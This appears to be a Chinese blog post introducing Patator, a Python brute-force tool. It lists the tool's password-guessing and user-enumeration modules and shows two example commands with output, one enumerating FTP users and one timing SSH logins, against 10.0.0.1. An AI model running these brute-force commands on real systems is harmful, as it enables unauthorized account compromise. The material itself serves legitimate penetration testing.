• SEO文章推广! 合作联系qq:122325244 正式全面改版 !免费SEO地址:https://www.seozhan.cn/tool 站长QQ群
  • 如果您觉得本站非常有看点,那么赶紧使用Ctrl+D 收藏SEO站长博客吧

Parator:基于python的多线程爆破小工具

脚本编程 SEO站长博客 4个月前 (08-01) 53次浏览 已收录 0个评论

摘要

0×0 背景

Patator 是出于对使用 Hydra,Medusa,Ncrack,Metasploit 模块和 Nmap NSE 脚本进行密码猜测攻击而感到失望后, 选择了不同的方法编写另一个暴力破解工具避免重复相同的缺点。Patator 是一个用 Python 编写的多线程工具,它比其他前辈更加可靠和灵活。

下载地址:

目前它支持以下模块:

   * ftp_login : Brute-force FTP * ssh_login : Brute-force SSH * telnet_login : Brute-force Telnet * smtp_login : Brute-force SMTP * smtp_vrfy : Enumerate valid users using the SMTP VRFY command * smtp_rcpt : Enumerate valid users using the SMTP RCPT TO command * finger_lookup : Enumerate valid users using Finger * http_fuzz : Brute-force HTTP/HTTPS * rdp_gateway : Brute-force RDP Gateway * ajp_fuzz : Brute-force AJP * pop_login : Brute-force POP * pop_passd : Brute-force poppassd (not POP3) * imap_login : Brute-force IMAP * ldap_login : Brute-force LDAP * smb_login : Brute-force SMB * smb_lookupsid : Brute-force SMB SID-lookup * rlogin_login : Brute-force rlogin * vmauthd_login : Brute-force VMware Authentication Daemon * mssql_login : Brute-force MSSQL * oracle_login : Brute-force Oracle * mysql_login : Brute-force MySQL * mysql_query : Brute-force MySQL queries * rdp_login : Brute-force RDP (NLA) * pgsql_login : Brute-force PostgreSQL * vnc_login : Brute-force VNC * dns_forward : Brute-force DNS * dns_reverse : Brute-force DNS (reverse lookup subnets) * ike_enum : Enumerate IKE transforms * snmp_login : Brute-force SNMPv1/2 and SNMPv3 * unzip_pass : Brute-force the password of encrypted ZIP files * keystore_pass : Brute-force the password of Java keystore files * sqlcipher_pass : Brute-force the password of SQLCipher-encrypted databases * umbraco_crack : Crack Umbraco HMAC-SHA1 password hashes 0×1 使用 FTP:Enumerating users denied login in vsftpd/userlis $ ftp_login host=10.0.0.1 user=FILE0 0=logins.txt password=asdf -x ignore:mesg=Login incorrect. -x ignore,reset,retry:code=500 19:36:06 patator INFO – Starting Patator v0.7-beta (at 2015-02-08 19:36 AEDT 19:36:06 patator INFO – 19:36:06 patator INFO – code size time candidate num mesg 19:36:06 patator INFO – —————————————————————————– 19:36:07 patator INFO – 230 17 0.002 anonymous 7 Login successful. 19:36:07 patator INFO – 230 17 0.001 ftp 10 Login successful. 19:36:08 patator INFO – 530 18 1.000 root 1 Permission denied. 19:36:17 patator INFO – 530 18 1.000 michael 50 Permission denied. 19:36:36 patator INFO – 530 18 1.000 robert 93 Permission denied. … SSH:Time-based user enumeration $ ssh_login host=10.0.0.1 user=FILE0 0=logins.txt password=$(perl -e print Ax50000) –max-retries 0 –timeout 10 -x ignore:time=0-3 17:45:20 patator INFO – Starting Patator v0.7-beta (https://gi2015-02-08 17:45 AEDT 17:45:20 patator INFO – 17:45:20 patator INFO – code size time candidate num mesg 17:45:20 patator INFO – —————————————————————————– 17:45:30 patator FAIL – xxx 41 10.001 root 1 <class __main__.TimeoutError> timed out 17:45:34 patator FAIL – xxx 41 10.000 john 23 <class __main__.TimeoutError> timed out 17:45:37 patator FAIL – xxx 41 10.000 joe 40 <class __main__.TimeoutError> timed out … 0×2 体验

weinxin


SEO站长博客 , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明原文链接:Parator:基于python的多线程爆破小工具
喜欢 (0)
[h4ck3st@126.com]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址